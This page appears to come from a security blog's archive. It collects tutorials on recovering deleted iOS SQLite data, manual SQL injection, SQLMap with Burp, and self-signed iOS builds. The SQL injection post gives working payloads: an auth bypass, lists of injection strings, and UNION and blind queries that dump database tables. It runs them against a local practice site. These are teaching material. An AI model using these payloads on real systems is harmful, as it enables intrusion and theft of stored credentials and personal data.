RSS
 

Sqlite data leakage in iOS applications

24 Jan

Most of the iOS applications store sensitive information like usernames, passwords & transaction details, etc.. either permanently or temporarily on the iPhone to provide offline access for the user. In general, to store large and complex data, iOS applications use the Sqlite database as it offers good memory usage and speed access. For example, to provide offline access Gmail iOS application stores all the emails in a Sqlite database file in plain text format. Facebook iOS application stores all the friends details in Sqlite files.

Unencrypted sensitive information stored in a Sqlite file can be stolen easily upon gaining physical access to the device or from the iTunes backup. Also, if an entry is deleted, Sqlite tags the record as deleted but not purge them. So in case if an application temporarily stores and removes the sensitive data from a Sqlite file, deleted data can be recovered easily by reading the Sqlite Write Ahead Log.

The below article explains on how to view Sqlite files and how to recover the deleted data from Sqlite files on the iPhone. For this exercise, I have created a demo application called CardInfo. CardInfo is a self signed application, so it can only be installed on a Jailbroken iPhone. The CardInfo demo application accepts any username & password, then collects the credit card details from the user and stores it in a Sqlite database. Database entries are deleted upon logout from the app.

Steps to install the CardInfo application:

1. Jailbreak the iPhone.
2. Download CardInfoDemo,ipa file -  Download link.
3. On the Windows, download the iPhone configuration utility – Download link.
4. Open the iPhone configuration utility and drag the CardInfoDemo.ipa file on to it.

iPhone configuration utility

5. Connect the iPhone to the windows machine using USB cable. Notice that the connected device is listed in the iPhone configuration utility. Select the device and navigate to Applications tab. It lists already installed applications along with our CardInfo demo app.

Cardinfo demo iOS app install

6. Click on Install button corresponding to the CardInfo application.
7. It installs the CardInfo application on to the iPhone.

cardinfo ios demo app

When an application is installed on the iPhone, it creates a directory with an unique identifier under /var/mobile/Applications directory. Everything that is required for an application to execute will be contained in the created home directory and it is known as bundle directory.

Steps to view  CardInfo Sqlite files:

1. On the Jailbroken iPhone, install OpenSSH and Sqlite3 from Cydia.
2. On windows workstation, download Putty.
3. Connect the iPhone and the workstation to the same Wi-Fi network.
Note: Wi-Fi is required to connect the iPhone over SSH. If the Wi-Fi connection is not available SSH into the iPhone over USB.
4. 
Run Putty and SSH into the iPhone by typing the iPhone IP address, root as username and alpine as password.
5. Navigate to /var/mobile/Applications/ folder and identify the CardInfo application directory using ‘find . –name CardInfo’ command. On my iPhone CardInfo application is installed on the – /var/mobile/Application/B02A125C-B97E-4207-911B-C136B1A08687/ directory.

cardinfo directory

6. Navigate to the /var/mobile/Application/B02A125C-B97E-4207-911B-C136B1A08687/CardInfo.app directory and notice CARDDATABASE.sqlite3 database file.

cardinfo sqlite file

7. Sqlite database files on a Jailbroken iPhone can be viewed directly using Sqlite3 command line client. View CARDDATABASE.sqlite3 and notice that CARDINFO table is empty.

cardinfo sqlite before login

8. On the iPhone, open CardInfo application and login (works for any username and password). 

cardinfo login

9.Enter credit card details and click on Save button. In the background, it saves the card details in the Sqlite database.

cardinfo - card details                    cardinfo - saved details

10. View CARDDATABASE.sqlite3 and notice that CARDINFO table contains the credit card details data.

cardinfo sqlite after save

11. Logout from the application on the iPhone. In the background, it deletes the data from the Sqlite database. 

cardinfo logout

12. Now view CARDDATABASE.sqlite3 and notice that CARDINFO table is empty. 

cardinfo sqlite after logout

Steps to recover the deleted data from CardInfo Sqlite file:

Sqlite database engine writes the data into Write Ahead Log before storing it in the actual database file, to recover from system failures. Upon every checkpoint or commit, the data in the WAL is written into the database file. So if an entry is deleted from the Sqlite database and there is no immediate commit query, we can easily recover the deleted data by reading the WAL. In case of iOS, strings command can be used  to print the deleted data from a Sqlite file. In our case, running ‘strings CARDDATABASE.sqlite3’ command prints the deleted card details.

cardinfo sqlite recovered

In iOS, if an application uses the Sqlite database for temporary storage, there is always a possibility to recover the deleted temporary data from the database file.

For better security, use custom encryption while storing the sensitive data in Sqlite database. Also, before deleting a Sqlite record, overwrite that entry with junk data. So even if someone tries to recover the deleted data from Sqlite, they will not get the actual data.

 
 

SQL Injection exploitation and dumping the database

07 Jan

SQL Injection:

SQL Injection is a web based attack used by attackers to steal sensitive information from organizations through web applications. It is one of the most common application layer attacks used since a  long time. This attack takes advantage of improper coding of web applications, which allow an attacker to exploit the vulnerability by injecting SQL commands into the prior web application. The underlying fact that allows for SQL Injection is that the fields available for user input in the web application allow SQL statements to pass through and interact with or query the database directly.

For example, let us consider a web application that implements a form-based login mechanism to store the user credentials and performs a simple SQL query to validate each login attempt. Here is a typical example:

select * from users where username=’admin’ and password=’admin123′;


If the attacker knows the username of the application administrator is admin, then he can log into the app as admin by entering the username as admin’– and without supplying any password. The query in the back-end looks like:

Select * from users where username=’admin’--’ and password=’xxx’;


Note the comment sequence (–-) causes the followed query to be ignored, so query executed is equivalent to:

Select * from users where username=’admin’;


Hence the password check is bypassed and the attacker is logged into the app as admin.

Different types of SQL Injections:

SQL Injection can be classified into 3 types based on the way it is exploited : In-band, Out-band and Inferior.

1. In-band:

This is also called as Error-based or Union based SQL Injection or first order Injection. The application is said to be vulnerable to In-band when the communication between the attacker and the application happens through a single channel. I.e. the attacker uses the same channel to enter the malicious string and to retrieve the data from the database. This is a straight forward technique. The application directly displays the retrieved data on the web pages.

Confirming the Vulnerability:

Below URL is In-band SQLI vulnerable practice site which I setup in my vmbox.

http://192.168.1.2/news-and-events.php?id=22


Accessing to the URL displays the home page as shown in the below image.

Sqlinjection demo

Now let us try to confirm the vulnerability by simply adding a single quote at the end of the URL:

http://192.168.1.2/news-and-events.php?id=22'


The above URL shows an error on the web page, saying that Error in your SQL Syntax. This is because of an extra single quote (‘) that we have entered through the URL into the query in the background. So by seeing the error we can understand that the URL is vulnerable to In-band SQLI. Below image shows you the error occurred due to concatenating the special character (‘).

Sqlinjection error

If single quote (‘) is blocked, then we can try using “or 1=1 –” or “and 1=1″ at the end of the URL.

http://192.168.1.2/news-and-events.php?id=22 or 1=1 -- (or)
http://192.168.1.2/news-and-events.php?id=22 and 1=1 --


Above URL shows the same page that has been displayed while accessing the URL:

http://192.168.1.2/news-and-events.php?id=22


This is because the condition that we have entered at the end of the URL is always true.

Now try to access by entering the string “or 1=0–“or “and 1=0–”. So the URL looks like:

http://192.168.1.2./news-and-events.php?id=22 or 1=0-- (or)
http://192.168.1.2/news-and-events.php?id=22 and 1=0--


Now we will not be able to access the page, because the condition “1=0” is always false. Below image shows the page when accessed with false condition.

Sqlinjection confirmation

Then we can confirm that URL is vulnerable to SQLI.

The string listed in the below table can be used to confirm SQL Injection

or 1=1‘or 1=1“or 1=1or 1=1–‘or 1=1–“or 1=1–
or 1=1#‘or 1=1#“or1=1#  or 1=1/*‘or 1=1/*
“or 1=1/*or 1=1;%00‘or 1=1;%00“or 1=1;%00‘or’‘or
‘or’–‘or–or a=a‘or a=a“or a=aor a=a–
‘or a=a –“or a=a–or ‘a’=’a’‘or ‘a’=’a’“or ‘a’=’a’‘)or(‘a’=’a’
“)”a”=”a”‘)’a’=’a‘or’’=’

You can try all the combinations for string “or a=a” that we have tried for “or 1=1”….. Like #,–, /* etc…

Extracting-Information:

Moving further, we can extract or dump the complete database by using “UNION” and “SELECT” commands.

Finding-the-DBMS:

We can find out DBMS type (MS-SQL, MYSQL, ORACLE) by using the unique functions of the appropriate database. For example to find out the database user, all the above databases have different syntax.

MS-SQL: user_name()
MYSQL: user ()
ORACLE: select user from dual;

So let’s try to find the DBMS of our SQLI vulnerable site. As a first trial I am entering “user_name()” at the place where we had “2”.

http://192.168.1.2/news-and-events.php?id=-22 union select 1,user_name(),3,4,5,6,7


Above URL gives an error saying “Function user_name doesn’t exist”. Which means the DBMS isn’t MS-SQL.

Find database in Sql injection

Above image shows that the DBMS isn’t MS-SQL. Now let’s try with “user ()”

http://192.168.1.2/news-and-events.php?id=-22 union select 1,user(),3,4,5,6,7


Above URL display the user name of the DBMS. So we confirm that the DBMS is MYSQL.

Sqli - fetch database username

Above image shows the database user name which proves that the DBMS is MYSQL.

So we can use all the MYSQL functions in the place of 2,3,5,7 and dump the database on the web page.

Finding-number-of-columns:

Let us try to find out the number of columns in the table using UNION.  The URL looks like:

http://192.168.1.2/news-and-events.php?id=22 union select NULL


Displays an error in the page saying “Select statement having different number of columns” .Now we understood that there are more than one column in the table.

finding number of columns using sql injection

Image shows the error message occurred by accessing the web site using above URL (Using select NULL). So try adding one more NULL.

http://192.168.1.2/news-and-events.php?id=22 union select NULL, NULL


Still if we are receiving the same error, then keep on adding the NULL to the query and try to find out number of columns in the table.

http://192.168.1.2/news-and-events.php?id=22 union select NULL, NULL, NULL, NULL, NULL, NULL, NULL


The above string gives you the same page as the initial URL as the number of columns in the table is seven.

finding columns usingsl injection by using order by

Figure shows the page when accessed with above URL. (Using seven NULL’S).

We can also use “ORDER BY” to find out the number of columns in the table.

http://192.168.1.2/news-and-events.php?id=22 order by 7--


So we can understand that there are seven columns in the table.

Now here is the trick. Where will we be able to see the extracted data from the database?

Just add a negative sign before the id value. Then the data appears on the web page straight away.

http://192.168.1.2/news-and-events.php?id=-22 union select 1,2,3,4,5,6,7


(Note: Negative sign (-) before 22)

Then the application displays some of the numbers on the web page.  Above URL displays 2,3,5,7 on the web page.

display content on web page using sql injection

Figure shows the numbers displayed on the web page.

Finding the version and getting the databases:
http://192.168.1.2/news-and-events.php?id=-22 union select 1,@@version,database(),4,5,6,7


finding version of database using sql injection

Figure display the database version “5.0” and the database “nilakantatrust”.

Extracting Tables from database:

Now let us try extracting all the tables from the database “nilakantatrust”.

http://192.168.1.2/news-and-events.php?id=-22 union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()--

extract tables using sql injection

Figure shows all the tables dumped from the database “nilakantatrust”.

Information_schema is the table which contains meta-data, nothing but information about all the tables and columns of the database.

Extracting columns from the tables:
http://192.168.1.2/news-and-events.php?id=-22 union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_schema=database()--

extracting columns using sql injection
Figure displays all the columns of the tables in the database “nilakantatrust”.  We can look at all the columns and then dump the interesting columns like passwords, SSN, Credit card numbers etc…

2. Out-Band:


This kind of an attack uses two different channels for communication between attacker and the application. Modern DBMS has very powerful applications and their features go behind simply returning the data to the users. They can be instructed to send an e-mail and they can also interact with file system. All of these functionalities are very helpful for an attacker. Attacker establishes direct connection to the database through one channel to insert the data or the malicious string into the database. DBMS responds through new channel, like e-mails, or executing the commands using xp_cmdshell etc….

3. Inferred:


This is also known as Blind – SQL – Injection. Here the server doesn’t responds with any syntax error or other means of notifications. This is very similar to normal SQL Injection but when attacked server doesn’t send any data to the attacker. Attacker need to retrieve the data by asking true or false questions through SQL commands.

The attacker needs to execute his commands by observing the response of the application.  This makes exploiting a SQL Injection attack more difficult but not impossible.

Now let’s have some practice:

http://192.168.1.2/news-and-events.php?id=22  and 1=1 --


The above URL gives the same data as of original site.

http://192.168.1.2/news-and-events.php?id=22  and 1=0 --


Above URL shows an error on the web page, as I explained you previously. (In “in-band” type)

Finding-the-DBMS:

To find out the DBMS used by the application we need to make use of different pre-defined functions available for different databases

For example, To find out the user name of the database following syntax is used by different DBMS

  • MS-SQL: user_name()
  • Mysql: user()
  • Oracle: select user from dual


You can know the difference from the cheat-sheet available at www.pentestmonkey.net

So, let us find out the DBMS using the above functions ;)

Accessing the below URL gives you a white page.

http://192.168.1.2/news-and-events.php?id=21

blind sql injection

Observe the white page in Figure which is different from the URL:

http://192.168.1.2/news-and-events.php?id=22

as we have seen the page previously. By observing this difference we can extract the DBMS type of the application.

Let us check whether the application is using MS-SQL:

http://192.168.1.2/news-and-events.php?id=21%2b(select%20case%20when%20(select%20user_name())%20then%200%20else%201%20end%20)--

In the above URL I am trying to add 1 to the id ‘21’ based on the condition. When we access the URL with ID=21 we get the page as shown in Figure (m) and when we access URL with ID=22 we get the home page as shown in Figure (a).

In the URL %2b indicates ‘+’ and %20 indicates ‘  ‘ (space). It is called URL encoding. When particular symbol is filtered we can pass those symbols by encoding using different encoding techniques available.

And the condition in the query is framed using “case” statement along with “user_name” (A pre-defined function in MS-SQL to return DB user name). If the function user_name() is found then the condition returns ‘1’ which makes the ID=22 else it returns ‘0’ and the Id remains ‘21’

finding database using blind sql injection

Figure shows page which confirms that the DBMS isn’t MS-SQL.  So, now let us check for “MYSQL”

http://192.168.1.2/news-and-events.php?id=21%2b(select%20case%20when%20(select%20user())%20then%200%20else%201%20end)--

Above URL shows the page with ID=22 which confirms that the DBMS is MYSQL.

Finding the version:

To find the database version we can use ‘substring’ function in MYSQL. Observe the below URL

http://192.168.1.2/news-and-events.php?id=22%20and%20substr(@@version,1,1)=5--

If the database version is ‘5’ then the substring function returns ‘5’ (as we are trying to extract only one character), where we are comparing the resultant value with ‘5’. Then if we are able to see the home page, we can confirm that the database is something like 5.x.x version.

If the URL doesn’t pops up the home page, then we can try changing the comparing value to 4,3 etc…

To find the exact version of the database we need to compare the second character of the version. For example

substr(@@version,2,1)=0
substr(@@version,3,1)=1

So, by observing the responses of the application we can extract complete version of the database.

Finding the User Name of the database:

We can find out the user name of the database by using both ‘case’ statement and ‘substring’ function.

http://192.168.1.2/news-and-events.php?id=22%2b%20(select%20case%20when%20(substr(user(),1,1)='a')%20then%200%20else%201%20end)--

Based on the responses of the application keep on changing the character in the function substr().
Once we get the first letter of the user name then move on to find out the second letter.

For example:

substr(user(),2,1)=’r’
substr(user(),3,1)=’b’ ….

In this fashion, to find out a single character in the user name, we have to send more than 200 request will all possible ASCII characters to the server. This technique can be optimized we can extract a single character from the database with in 8 requests.

Conclusion:

SQL Injection is a powerful attack technique which can be used to dump complete database of the application.

I have written this article for infosec institute. Take a look at the web application security course offered by infosecinstitute.

 

 
No Comments

Posted by kamalb

 

Build ipa file using XCode without provisioning profile

26 Dec

To develop an application for iOS devices one should first obtain a provisioning profile by joining the iPhone Developer Program (which costs $99). However, some simple tricks can be used to build self signed applications using Xcode, that can be installed on Jailbroken devices. The steps provided below explains the detailed procedure to build ipa files without developer certificate for Jailbroken devices. This is tested on Mountain Lion 10.8, Xcode 4.5 and iOS 6 SDK.

Steps to build ipa file using Xcode:
1. Create a self signed code signing certificate.

On Mac OS X, go to Keychain Access -> Certificate Assistant -> Create a Certificate. It opens the certificate assistant window. Enter name (in my case it is securitylearn.net) and select certificate type as Code signing. Check let me override defaults option. Hit continue until it creates the certificate.

OS X self signed certificate

After creation of the certificate, the keychain looks as shown in the image below.

Certificate in keychain1

2. Copy /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Info.plist to desktop. Edit the plist file and replace all occurrences of XCiPhoneOSCodeSignContext by XCCodeSignContext (3 places – defaultproperties, runtimerequirements, overrideproperties).

Before modification:

xcode info plist before modification

After modification:

xcode info plist after modification

3. Copy the modified Info.plist file to /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/ directory and replace the existing file.
4. Close and Restart the XCode.
5. Create your project in the XCode and in the project target settings choose the certificate created in step 1 as the code signing identity. Project target settings are shown below.

xcode project code signing settings

6. Build the project for iOS device (Project->Build).
7. Build creates the .app file in the build/Debug-iphoneos folder.

Xcode build app

Default location for .app file is -
/Users/[user name]/Library/Developer/Xcode/DerivedData/[your app]/Build/Products/Debug-iphoneos/

xcode build directory

8. Create a folder named Payload and copy the .app file into it.

Payload folder

9. Archive the Payload folder. It creates Payload.zip.
10. Rename the Payload.zip to [app name].ipa. We have successfully created the ipa file without developer certificate and this can be installed on a jailbroken device using iPhone configuration utility.

This comes handy for pentesters as well, if they want to create vulnerable demo apps.

Update on 16-Feb-2013: To install self signed ipa on iOS 6 devices, (Thanks to Leo for sharing this info) 
1. Go to Cydia->Manage and add http://gdeluxe.com/repo as a source.

appsync cydia

2. Download and install AppSync for iOS 6.x from Cydia.
3. Now you can install the ipa file using the iPhone configuration utility.

 
 

Exploit SQL Injection through SQLMap Burp Plugin

17 Dec

SQL Injection:

SQL Injection (SQLi) is a web based attack used by hackers to steal sensitive information from organizations through web applications. It is one of the most common application layer attacks used today. This attack takes advantage of improper coding of web applications, which allows hackers to exploit the vulnerability by injecting SQL commands into the prior web application.The underlying fact that allows for SQLi is that the fields available for user input in the web application allow SQL statements to pass through and interact with or query the database directly.

For example, let us consider a web application that implements a form-based login mechanism to store the user credentials and performs a simple SQL query to validate each login attempt. Here is a typical example:

select * from users where username=’admin’ and password=’admin123′;

If the attacker knows the username of the application administrator is admin, then he can log into the app as admin by entering the username as admin’– and without supplying any password. The query in the back-end looks like:

Select * from users where username=’admin’--’ and password=’xxx’;

Note the comment sequence (–-) causes the followed query to be ignored, so query executed is equivalent to:

Select * from users where username=’admin’;

Hence the password check is bypassed and the attacker is logged into the app as admin. SQL Injection can be tested in two ways - Manual Pen-Testing & Automation.

1) Manual Pen-Testing: This is the process of detecting & exploiting the vulnerability manually. We need to test the vulnerability manually by passing the malicious strings and exploit it. I’ll give a clear explanation of exploiting SQLi manually in my next post.

2) Automated: This can be done by running the tools. There are many tools to find and exploit the SQLi vulnerability, some of them are SQLMAP, ABSINTHE, SQL NINJA, The Mole, etc… . I would love to use some tool which can be attached to a proxy that I use in my work regularly. So I chose SQLMap plugin for burp.

SQLMAP:

SQLMAP is an open source penetration testing tool that helps in automating the process of detecting and exploiting SQL injection vulnerabilities and taking full access over the database servers. SQLMAP comes with powerful detecting engine, and many niche features for the penetration tester and wide range of switches lasting from database fingerprinting, data fetching from the database, accessing the underlying file system and executing the commands on Operating System via Out-of-band Connections.

Since SQLMAP is developed in python it is a portable application, meaning that it will work in any operating system that supports python.

SQLMAP burp plug-in:

When we audit a web application, we normally configure an intermediate proxy to have more control over the request and response parameters. SQLMAP plug-in is an add-on feature that we can configure to the burp through which we can redirect a URL or a request directly to the SQLMAP with a single mouse click.

Plug-in Setup:

1. Download the plugin zip file from the following URL: http://code.google.com/p/gason/downloads/list
2. Unzip the file and keep it in the same folder where burp proxy is located.
3. Then execute the following command to run the burp with plug-in.

Linux:

Java –classpath burpplugins.jar:”burpsuite_v1.4.0.1.jar” burp.StartBurp

Windows:

Java –classpath burpsuite_v1.4.0.1.jar;burpplugins.jar burp.StartBurp

*Replace the burpsutie with the appropriate version that you are using. In my case I am using burpsuite_v1.4.0.1.jar. We also need to download the SQLMAP tool as we need to supply the executable to the burp plug-in.

Setting up SQLMAP:

For Windows,
1. Download and Install python 2.7 -http://www.python.org/getit/
2. Download sqlmap - https://github.com/sqlmapproject/sqlmap
3. Unzip the name.zip file to sqlmap directory.

For Ubuntu or Linux, run the below commands from the terminal

> Sudo apt-get install python-tk python2.7
> git clone git://github.com/sqlmapproject/sqlmap.git
> cd sqlmap
> wget http://gui-for-sqlmap.googlecode.com/files/sqm-60712.zip
> unzip sqm-60712.zip

Setting up the environment:

- If you are using OWASP broken web application, then simply access one of the vulnerable site from your local browser where you are running SQLMAP.
- If you don’t use OWASP broken web application, then you need to set up a virtual machine that has a web server to host the vulnerable web application.
- Configure another VM with ubuntu where the attacker runs SQLMAP

Configuring the Proxy:

- If you are using Mozilla Firefox, then go to Edit > Preferences > Advanced > Network > settings and select “Manual Proxy Configuration” by enabling the radio button. Run the HTTP proxy with local-host and the port in which the proxy is running.
- If you are using Chrome, then go-to settings > Show Advanced Options > Network > Change proxy Settings > Connections > Lan settings.

How to use the plug-in:

Once you load the plug-in, then it is very easy to make use of it. Run the burp proxy with loaded plug-in. In the “site map” tab under the “target” you can see the particular domain that you are trying to test for SQLI and all the crawled pages related to the domain. On the right side click on the URL that you want to test, you can see the request parameters of the URL in the bottom panel. Right click on the request parameters and you can see the option “Send to sqlmap” as shown in the figure below.

Forward URL To Sqlmap burp plugin

Then you can see a new window (SQLMap wrapper) that will allow you to configure sqlmap. Below Image gives you a clear view of the wrapper.

sqlmap plugin window

Now lets have an over view of configuration features of the wrapper. In the “Target” text box specify the URL that you are willing to test. (Normally it will be filled by default as you have sent the request parameters previously, if needed you can change the URL).

Specify the method on which the domain is accessible (GET/POST).  In the “Bin-path” give sqlmap executable.

If you are aware of the DBMS of the web application, specify the database by selecting one of the options listed in the dropdown list. By default “auto” is selected which means that the SQLMAP wrapper tries with all the databases listed in the dropdown list to find out the database used by the application.

You can enumerate the database users, passwords, roles, privileges, databases etc by selecting the appropriate option from the Action drop down list. By default it is set to “auto” which means it will try to enumerate all the options listed in the drop down list in the sequential order.

If you are aware of the databases, users, tables, or columns, you can enumerate it by simply specifying it in the Database options.

Tampers are a kind of special characters or symbols that you are willing to insert into the query while pen-testing the application.

Once we configure the SQLMAP click on the “RUN”, this will open a new tab with execution of the program with the configuration that you have given to the wrapper or the SQLMAP. We can make any number of simultaneous execution tabs with difference instances. Below image shows the output tab.

Sqlmap output

Bored with theory, now lets see an example, the below URL is a vulnerable site for practicing the SQLI. You can also find the SQLI practice URL’s by goggling.

http://192.168.2.3/news-and-events.php?id=22

Id parameter in the above URL is vulnerable to SQLI; lets find it out through our SQLMAP wrapper (Burp suite plug-in).

Open the URL in the browser for which the proxy has been configured. In the proxy (burp) go to the “site map” and click on the URL and send it to the sqlmap by right clicking on the response parameters of the website, as I mentioned previously. Figure below shows you the wrapper opened for the above mentioned URL.

sqlmap plugin settings

The target specifies the URL we are testing, cookie specifies the cookie or session id.  Wrapper automatically identifies the positions in the URL where SQLI can be injected and specifies list of the parameters in “Parameters to test” text area (in our case we have only one possibility for injection which is “id” parameter).

In this example I have configured the SQLMAP wrapper to enumerate the list of databases that are configured in the backend database.

burp plugin sqlmap output

Above figure shows you the output tab which intend displays you how the plug-in tried to exploit the SQLI vulnerability in different ways

We can see that initially the wrapper tried to exploit the vulnerability by using “Boolean-based blind SQLI” by using AND operator. The payload shows how the tool tried to exploit the vulnerability. Here we can see the payload: id=22 AND 4626=4626, which is equivalent to the following URL:

http://192.168.2.3/news-and-events.php?id=22 AND 4626=4626

As the URL is always true, the above URL returns the same page as of the original URL.

In the second trail it tried “error-based SQLI”. Later by using UNION operator.

Retreive database with sqlmap

From the above figure  we can observe more server details like web server, Operating System, back-end DBMS.

“Information_schema”  and “nilakantatrust” are the two databases that are used by the web application.

Now let us try to enumerate all the tables and the columns of the tables from the above databases.  To do so configure the SQLMAP wrapper Action field with the option “Enumerate database tables and columns”.  Below Figure shows you the same.

extract tables and columns using sqlmap

Below figure shows us the tables of the database “nilakantatrust”.

extracted tables and columns

Let us see the columns of these tables. Figure below shows the columns and their data types of two tables “est_notice” and “est_news” of  nilakantatrust database.

columns retreived using sqlmap

We can also dump complete database by selecting the option “dump dbms databases”.  And also store complete data into a file by using the option “save to file” in the output tab.

sqlmap output to file

Above figure shows the dumped data of the table “est_admin” from “nilakantatrust” database and storing it into a file.

Conclusion:

SQLMAP is a powerful tool which is used to automate the process of detecting and exploiting the SQLI.

I have written this article for infosec institute. Take a look at the web application security course offered by infosecinstitute.

 
1 Comment

Posted by kamalb

 

Hacking and Securing iOS Applications : Video

13 Dec
 
 

Hacking and Securing iOS Applications : Slides

03 Dec

A deck of slides which I have used for my presentation @ Clubhack 2012, India.

Abstract
iOS applications share common set of classes and highly depends on the operating system solutions for data communication, storage and encryption. Solely depending on the Apple implementation made them less complex but it affects security of the applications. Though iOS comes with a great set of security features like code signing, ASLR, DEP, sand boxing and Data Protection, all of them are subject to attack. Relying only on the iOS security could lead to demise the sensitive data stored within the application when the iOS is compromised. Application security can be improved by understanding the weaknesses in the current implementation and incorporating own code that work better.

The presentation illustrates several types of iOS application attacks like run time manipulation, custom code injection, SSL session hijacking and forensic data leakage. It gives an insight into the iOS Keychain & data protection API and explains the techniques to circumvent it. The presentation will provide guidelines and suggests best practices for secure iOS application development.

Slides

 

Demo Videos
I want to thank my friend TC for helping me in developing couple of apps for the demos.

 

 

 

 

 
 
Page 4 of 13« First...23456...10...Last »